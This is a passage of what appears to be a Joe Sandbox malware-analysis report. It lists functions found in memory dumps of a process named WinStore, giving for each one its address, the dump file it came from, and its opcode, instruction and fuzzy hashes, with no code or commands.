M, xrefs: 00007FF848F5A636

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 5a9d2d703909d729bc091c1e1c2c3f76e2f9751548b1ec4fff4744248882a9bd
Instruction ID: aa05d6c20c27143ec85fcad1f0bfb6e9d1f883b56a529807c16f1abcf3822d16
Opcode Fuzzy Hash: 5a9d2d703909d729bc091c1e1c2c3f76e2f9751548b1ec4fff4744248882a9bd
Instruction Fuzzy Hash: 9DE06D7160E7C44FC71AAA34886D454BFA0EF6721174A42EEC445CF1A7EA2D8889C701

Function 00007FF848F5E789 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F5E7A6

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 6227141cf3aa6e3c8f572d33fc98ca009a7d81f578be5dd730feafd46393cf97
Instruction ID: 14ada7a49f31c47788825a52e26b688faf695794fcc332e526f69a85beaeba8f
Opcode Fuzzy Hash: 6227141cf3aa6e3c8f572d33fc98ca009a7d81f578be5dd730feafd46393cf97
Instruction Fuzzy Hash: 5EE06D7190E7C44FC71AAA348869454BFA0EF6720174A42EFC049CF1A7EA2D8889C701

Function 00007FF848F51CC9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F51CE6

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 33eded123b519ac6a1e3e8fd95599586ccda739796097d0a8fedb3aa771b4ea6
Instruction ID: 9f997204b030df131deb3f48c504e1ff73e536d533aa3d85443a2bdf630bcff7
Opcode Fuzzy Hash: 33eded123b519ac6a1e3e8fd95599586ccda739796097d0a8fedb3aa771b4ea6
Instruction Fuzzy Hash: 40E06D7140E3C04FCB0AEB3888698443F60AE6725078A40EEC045CF0B3E61D8849C701

Function 00007FF848F53D89 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F53DA6

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 94208d3abf629fbd8bf9d90f0bc2c2c3e6fc1dadfe556103c078dfbb8cb85455
Instruction ID: 49735462df1b2ab9caee9837d2354954a7b3d12d57da4cb2fc189a6160e224c1
Opcode Fuzzy Hash: 94208d3abf629fbd8bf9d90f0bc2c2c3e6fc1dadfe556103c078dfbb8cb85455
Instruction Fuzzy Hash: A3E0E57284E7D44FCB5AAB3888798557FA0AE6721178A40EEC149CF1A7E6298849C711

Function 00007FF848F5AB19 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F5AB36

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 7c037a3094944874441c07c5ab7b1b2cdd9db307162cb5f6360db66a73ce9242
Instruction ID: 4014e4abe8f15d02b646368e7a416b54b0ad5429e9d877de7523d2fa5a9ff196
Opcode Fuzzy Hash: 7c037a3094944874441c07c5ab7b1b2cdd9db307162cb5f6360db66a73ce9242
Instruction Fuzzy Hash: 75E0ED7154E3C44FC706EB3488699547F61AE6721174A41DEC04ACF1A7E62D9855C701

Function 00007FF848F58199 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F581B6

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 56391f63d5a5e64260e5f17a4ce3d1696f1033f9d97df993768f31dbc8f34554
Instruction ID: 32249750c4b2fbc0da01ad4f45ab9ce17987e495f06003b28755c3ec8a541b99
Opcode Fuzzy Hash: 56391f63d5a5e64260e5f17a4ce3d1696f1033f9d97df993768f31dbc8f34554
Instruction Fuzzy Hash: D2E01A7144A3C04FCB06AB3488659453FA0EE6725078A40EEC145CF1B3E62D884AC701

Function 00007FF849311231 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d69266bd855037247d11e9448bc22facd6627ffb69f509969b786042b8d7d85
Instruction ID: 63bfd9efed78b716d396af49d9d741fe7150ca760e8257ae803154c10d1973e8
Opcode Fuzzy Hash: 1d69266bd855037247d11e9448bc22facd6627ffb69f509969b786042b8d7d85
Instruction Fuzzy Hash: 9531FB32D0D1E68EE6757EA834138FE67605F47BA0F1921B6C44D8A0E3ED0C2C45029A

Function 00007FF84931D251 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dd3e7cd37c612d70d86c30b30d9b7f0c7853d7ea89a8e12c4a3790379646efa
Instruction ID: 11f6d380498f0ebc895963d52c4d84de6aeda9b0e4f296c0c11c4a59a55d8597
Opcode Fuzzy Hash: 6dd3e7cd37c612d70d86c30b30d9b7f0c7853d7ea89a8e12c4a3790379646efa
Instruction Fuzzy Hash: 2161063191C6CA4FE36AAB2898562B57BE0EF57340F1800BED45AC31E3EE1CA846C351

Function 00007FF8493139CE Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6951d4e96ec676697ead7c688a8ba3510a90a72c7f4888d8466f31f5580b5487
Instruction ID: 9d9d58ade6c1a3cd5ceab020acf6b6b9aa93f29be1ca7b3c3928ec59447ef996
Opcode Fuzzy Hash: 6951d4e96ec676697ead7c688a8ba3510a90a72c7f4888d8466f31f5580b5487
Instruction Fuzzy Hash: 1771153050CAC68FE759EF28C4916A0B7E0FF06340F5491B9D08DC7697EB28B891C795

Function 00007FF848F5D0B0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b21eded31eae7b1ae71ed9b062dbe18663f49342559accd76063f7349d04c8a4
Instruction ID: e9d2fc7fb49fd45cb4795998117be81b756cce2c6358f1b616c37ba6a06b9a0f
Opcode Fuzzy Hash: b21eded31eae7b1ae71ed9b062dbe18663f49342559accd76063f7349d04c8a4
Instruction Fuzzy Hash: 95515031E0C94A9FEB58EB6898556BDB7E2FF98351F18016AD00AE32C3DB285801C759

Function 00007FF848F53465 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2afeaf733095e6855f5a71bcb8fedfb1ffc47bd0917d3b4d347f319b61f2ed1
Instruction ID: aed512a5cfc74480fa9d1f1b8546f9dab4923149a1fd1a7146e0c198bebe4a30
Opcode Fuzzy Hash: c2afeaf733095e6855f5a71bcb8fedfb1ffc47bd0917d3b4d347f319b61f2ed1
Instruction Fuzzy Hash: C951D031E1C94E5FEA88FB2C84567B9B2D2FB95381F444179D40EC32C7EE2CA9858395

Function 00007FF849312DF4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54fce09ad06ba64ea790fe081a9e0459f974ce16e3bdb3961eee650291c96748
Instruction ID: 67beadcf0df7cbceacf5aa0b736ea8e8acd98337fa1ceb3ad0186ed33c92501a
Opcode Fuzzy Hash: 54fce09ad06ba64ea790fe081a9e0459f974ce16e3bdb3961eee650291c96748
Instruction Fuzzy Hash: 5F513A3191C7854FE378EE18A8425B5B7E0FF97350F10157EE4CEC35A2EA29B8028791

Function 00007FF848F5889D Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce5732f577c1445ea9aa879964f259a398852310feee5d5e7e6560386c8469b
Instruction ID: 77bd17fe47641c58c97038f2b46aa9d8cfc32d4fc163d6649444f7527b6adc1f
Opcode Fuzzy Hash: 4ce5732f577c1445ea9aa879964f259a398852310feee5d5e7e6560386c8469b
Instruction Fuzzy Hash: 25515830D1C95A8FEB98EB58C8557A9B7B1FB98341F5041B9C00EE32C2DF3869849B59

Function 00007FF849315627 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196afd7b868ed9f412136c0bd26d83063acb9f78c56c23f29cdc601bd44a1f6a
Instruction ID: 5ce90e442aded8df786155a46033edb4fcdbe60b3731ca4627c601460054f068
Opcode Fuzzy Hash: 196afd7b868ed9f412136c0bd26d83063acb9f78c56c23f29cdc601bd44a1f6a
Instruction Fuzzy Hash: 42418631A0C9498FDB9CFF6CD4569B5B3E1FBA9315B04016AD00EC3596DF24E849CB91

Function 00007FF8493156D1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512ea33d52a0c9d06f117739b872bbf53697c008a310d8183e8ec0fdce50d53b
Instruction ID: 3bcde314974966a9906dda68b641b9907f4be30868b3188952efa6c5e9f10376
Opcode Fuzzy Hash: 512ea33d52a0c9d06f117739b872bbf53697c008a310d8183e8ec0fdce50d53b
Instruction Fuzzy Hash: 86319331A0C9888FDB9CFF2CC4559B4B3E1FBA9315B0402AED00AC75D6DE24E849CB91

Function 00007FF849310541 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36803ae8ea3c9651268573014afe13271e54eafdfe1ded4e83dfb0dc77f14f65
Instruction ID: de8008534e69acccc1dc14d11ef0cb24bf7e1db4b6954886833de332d0c05adb
Opcode Fuzzy Hash: 36803ae8ea3c9651268573014afe13271e54eafdfe1ded4e83dfb0dc77f14f65
Instruction Fuzzy Hash: 3B31C031A0CD588FDB5CFF28C0A5EA577E0FBA9315B0402A9D04EC7596CE38E885CB91

Function 00007FF848F34051 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32caa1c6c1e57679ad19f7c0d64b7adbcd32f434ed6464c1393db8a50624f5a9
Instruction ID: 172768f3065d4aaf20bea6d1c6006b0589b583def3b1cbb37b65cf3314b04778
Opcode Fuzzy Hash: 32caa1c6c1e57679ad19f7c0d64b7adbcd32f434ed6464c1393db8a50624f5a9
Instruction Fuzzy Hash: 1631C231E0CA8A4FE753BB7898551A87FA0FFB5350F4901F7D449CB0D2DA2859458345

Function 00007FF84931566B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d0ff668d78bd558fb3ada342d352ace3993c16c46817a94f05534b14a05e36
Instruction ID: 5f5a8d7a6022e6ed1135849f07cde0c41b2453b8c05718bdda002c038a659c79
Opcode Fuzzy Hash: 03d0ff668d78bd558fb3ada342d352ace3993c16c46817a94f05534b14a05e36
Instruction Fuzzy Hash: EC317531A0C9498FDB9CFF28D4559B5B3E1FB69315B0401AED00AC75D6DF28E849CB91

Function 00007FF849312EC9 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d93bf691226c781e410914d6cdf4f3e77134b245ad5d2b11f0fe065690f386
Instruction ID: 6b495509ec45e3ba980a04dc3550c61e40c2c6fd8b7953415cf85ab82df160dd
Opcode Fuzzy Hash: 82d93bf691226c781e410914d6cdf4f3e77134b245ad5d2b11f0fe065690f386
Instruction Fuzzy Hash: 3D31C43192C6C54FE379EE28580757577E4EF57394F24247EE4CEC21A2F91878068352

Function 00007FF8493102A5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ae70dde9b6f58423468728fc62282d09c7cd4e40e9617ffbaef40a94ef7ed4
Instruction ID: 7e6cfadbb582357fc609eef4538e7e06520024e97eab426726c53b588be7b042
Opcode Fuzzy Hash: c8ae70dde9b6f58423468728fc62282d09c7cd4e40e9617ffbaef40a94ef7ed4
Instruction Fuzzy Hash: B9315E3090C99ECFEBA8EF5484525BD77B0FF4A340F54157AD00DE71A1EB3869409741

Function 00007FF848F62DDF Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4fb030fadae435066520895a927de0d0d687d7c3d18d6522c2f3a851324a9e
Instruction ID: 13ab99d7665346262a7d2bf377ed1733d1e3d8f7b71a8ae9eafca709301ec32d
Opcode Fuzzy Hash: 2d4fb030fadae435066520895a927de0d0d687d7c3d18d6522c2f3a851324a9e
Instruction Fuzzy Hash: E1218130A0CA098FE788FF58C49576977E2EB98355F14863AD40AD32D6CF78A8868745

Function 00007FF848F5B8B5 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578219493069f99692cabbd272b51e06e2d049047d42c58f42b785a707b8f0dd
Instruction ID: 41d940e6f88dfd7705e66d613ee62b24e18de328791f7d966d7d762bccdbeee0
Opcode Fuzzy Hash: 578219493069f99692cabbd272b51e06e2d049047d42c58f42b785a707b8f0dd
Instruction Fuzzy Hash: FB11CB3691DC868BE319A72CC4AA4F5F7A0FF1135AF1811B9C0898E1D3EF196887C644

Function 00007FF848F523CA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0eed92fc8181d249260146962ef2acfdc47d454c0d95385d337babc193f499d
Instruction ID: c61e430d917cec2bab65f5e0efb02550a22519eb60a6cb3bf08d0fcab1903efb
Opcode Fuzzy Hash: f0eed92fc8181d249260146962ef2acfdc47d454c0d95385d337babc193f499d
Instruction Fuzzy Hash: AE11C131E0C95A8FE748FB58D4916B9B7A2EB95750F000279C40ED72C7CF3C68818796

Function 00007FF848F5D79C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63aa7578eb86cf488212dd2de24814010d9f308d7645f9cf3a2bc06de01e7e15
Instruction ID: 45c7ea96190af6a7e1788205a970871cdf92f31fca0629ed55814c8a98d09b81
Opcode Fuzzy Hash: 63aa7578eb86cf488212dd2de24814010d9f308d7645f9cf3a2bc06de01e7e15
Instruction Fuzzy Hash: 15011E32E0D4299BEB54F658A4403FDF3A1EB98761F140175D44DA31C5CB2C6D4587D4

Function 00007FF848F62D09 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e5aa48219d209a30d7de5b6bf4b7435a03b5da50330cff450829a89679b997
Instruction ID: 30daae53eb82f0200656c7e3a74bfa541a89bec0f8e233c0df6cc50dd43ccfeb
Opcode Fuzzy Hash: 05e5aa48219d209a30d7de5b6bf4b7435a03b5da50330cff450829a89679b997
Instruction Fuzzy Hash: 63015E31D086499FDB59EF58C4D5AAD77F1FB98740F14022ED409E3291CF386942CB45

Function 00007FF848F5B1FD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc2fcd4ba638be3853fc346d2a4cc2c4d23205ec594957d37d56f19295b715b
Instruction ID: 14eb7f18b0e945dda19a27af4d6ef2edbae8c9f468a96b00cfe88dd77b14aed2
Opcode Fuzzy Hash: fdc2fcd4ba638be3853fc346d2a4cc2c4d23205ec594957d37d56f19295b715b
Instruction Fuzzy Hash: 15F08C31F2984D8FE686FB68A84A6F8B7E1FB58715F400076E40DC3183CF2858458761

Function 00007FF848F5793D Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d295503a6182fecc283e5a62bcef68ff5a7ea24eceb923d5a2fc49a86c3fa3a
Instruction ID: 85d401d820240c95c75fde7936392d786876a98f24cfb4225ee4940aaa25625f
Opcode Fuzzy Hash: 9d295503a6182fecc283e5a62bcef68ff5a7ea24eceb923d5a2fc49a86c3fa3a
Instruction Fuzzy Hash: 33F03722A0E7C54FD71B5B388C654687FB19E5726170B00E7C481CF0F3DA19998BC362

Function 00007FF849311A32 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078c692e6c5ebc2f46da4f270c7ff9ae8603ddb9119be3685c8fac44a2562e6a
Instruction ID: 389efceda85214ee24d3643befae6a5c70f43f06c742c824446f5bc10b0d09dc
Opcode Fuzzy Hash: 078c692e6c5ebc2f46da4f270c7ff9ae8603ddb9119be3685c8fac44a2562e6a
Instruction Fuzzy Hash: 49F0623244E2C59FD352DBB088529D97FB4AF43254F1910FAD445CB0A3D66D5A0AC752

Function 00007FF848F304E8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc65c42138d4daaf30922c6f8c75a6bfb21b6a9810f1df61ce70e207354cfc8f
Instruction ID: a8bd8b369fc250bbd8263a2cccac1dd226ce6d7c3b2c70a9863f245d7e05ac2e
Opcode Fuzzy Hash: dc65c42138d4daaf30922c6f8c75a6bfb21b6a9810f1df61ce70e207354cfc8f
Instruction Fuzzy Hash: 2DF01C31A1CD1A0FD5A4F32D98456B991C6EFD8690F840177E80DD32D5FE58B9418388

Function 00007FF848F6121F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c883c61065718607ef5365dae3e3fa82a66d26d110c0dd795e6efbe02943afdc
Instruction ID: 7a815bbc41bc00b5df55adf054d5af483cb3fd2a7c97e5cc49ece1024760c85c
Opcode Fuzzy Hash: c883c61065718607ef5365dae3e3fa82a66d26d110c0dd795e6efbe02943afdc
Instruction Fuzzy Hash: E1013C34E0850A8FEB44EB48C889BBE77F2FB91351F040679C016E72D5DB786986CB84

Function 00007FF848F5AA89 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34a7c362cfa16d16533a86069af8bb0da9d9e455472488220ef3ec1f7a627df
Instruction ID: 4a4859c8d0fe39002b627abef993c21bdacb8df08d536273a8a5c1945411bd59
Opcode Fuzzy Hash: f34a7c362cfa16d16533a86069af8bb0da9d9e455472488220ef3ec1f7a627df
Instruction Fuzzy Hash: 5EF0E521B4DBC40FC72AA62D58A5065BFE1DB6B10134901FFC086CB2E3ED59AC8A8341

Function 00007FF848F5E40E Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd623bb2d350fa1b9faa5211e143434a0fb04f1e0d89571a336ad15921b31ab5
Instruction ID: 50c0bd754a6a8d46596a8b23f2c5db8cce57d92ba857b61c8356084bb63f2952
Opcode Fuzzy Hash: bd623bb2d350fa1b9faa5211e143434a0fb04f1e0d89571a336ad15921b31ab5
Instruction Fuzzy Hash: 86F01730E0D9198FE754FB188444BA9B7D2EB94351F5141B5D00EC32CACF68A8824684

Function 00007FF8493189C6 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2931224500.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22791bc9df73687a8a668ed6870188a01e48b96d1e9ed29005435b12ae3e4482
Instruction ID: fe00259be8e7df2f7f3b0f3f262c550903c6cd1ace0617916258fbc35c9400c5
Opcode Fuzzy Hash: 22791bc9df73687a8a668ed6870188a01e48b96d1e9ed29005435b12ae3e4482
Instruction Fuzzy Hash: FAF0BE31A0C58A8FE364EF08C8917E43292EB86360F180276D00DC31E6EA7CAD85C785

Function 00007FF848F5AAA0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
Instruction ID: e28ce4173a8e412c5bea0b82bd9e50c8deab70beb668483cf558c0399b989dd2
Opcode Fuzzy Hash: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
Instruction Fuzzy Hash: 5DD02B30760F0C074B2CA52E6445471B3D5C79E206344427E945BC3394DC50EC8247C4

Function 00007FF848F57909 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baef50d89741826d28b1b85e58fb154720749967019fab85d94c6294077ba873
Instruction ID: e2e3aff286b11ae1c37b49eedd04895e95a2abd5a263fc9eaba18689f58b27a4
Opcode Fuzzy Hash: baef50d89741826d28b1b85e58fb154720749967019fab85d94c6294077ba873
Instruction Fuzzy Hash: F2E01A7194E7C08FC74B9B3488B88507F60EE5721178A40EAC045CF1E3DA298C49C712

Function 00007FF848F52038 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19aeb5a50cb6d9744a9e778eb85769329b9e813eb95e8f5167183162b85669ee
Instruction ID: c2b39302436af14a04c8604e6aa2aa875275415a7cc59edca6972914e1c0945e
Opcode Fuzzy Hash: 19aeb5a50cb6d9744a9e778eb85769329b9e813eb95e8f5167183162b85669ee
